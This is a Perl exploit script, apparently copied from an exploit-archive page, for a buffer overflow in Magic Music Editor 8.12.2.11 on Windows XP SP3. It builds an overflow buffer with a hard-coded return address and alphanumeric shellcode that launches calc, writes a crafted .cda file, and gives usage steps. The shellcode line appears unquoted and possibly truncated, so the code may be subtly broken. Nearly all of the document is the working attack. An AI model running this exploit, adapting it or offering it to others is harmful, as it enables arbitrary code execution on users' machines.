Magic Music Editor Buffer Overflow Exploit

2011-03-02 10:15:24

#!/usr/bin/perl
#
#
#
#[+]Exploi Title: Exploit Buffer Overflow Magic Music Editor
#[+]Date: 03\01\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.magic-video-software.com/downloadserver/Magic-Music-Editor.exe
#[+]POC Found By: AtT4CKxT3rR0r1ST(http://www.exploit-db.com/exploits/16255/)
#[+]Version: 8.12.2.11
#[+]Tested on: WIN-XP SP3
#[+]CVE: N/A
#[+]Language: English
#
#Este exploit é Buffer Overflow q foi encontrado por AtT4CKxT3rR0r1ST(http://www.exploit-db.comexploits/16255/)
#
#Criado por C4SS!0 G0M3S
#E-mail [email protected]
#Site www.x000.org
#
#
#
#How Use:
#
# For the exploit to work you put this file on drive C in the early C: \ exploit.pl
# Must be the address then click the exploit that creates a folder and either AAAAAAAA
# inside it will have the file open file.cda magic music editor open the file inside the folder
# THEN BOOM OPENS CALC
#
#Video: http://www.youtube.com/watch?v=T7KlxfNCy1o
#
#
print q{
Author: C4SS!0 G0M3S
E-mail: [email protected]
Site: www.x000.org/

};
print "[+]Creating File fil3.cda...\n";
sleep(2);
$buf = "\x41" x 25;
$buf .= pack('V',0x77207D33);
$buf .= TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIP3O0PPU8SS3QBL3SF40XPPONDM15MVSLKON6A;#SHELLCODE WINEXEC CALC

mkdir($buf);

open(f,">c:\\$buf\\fil3.cda");
print f ("\x41" x 90000);
close(f);

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.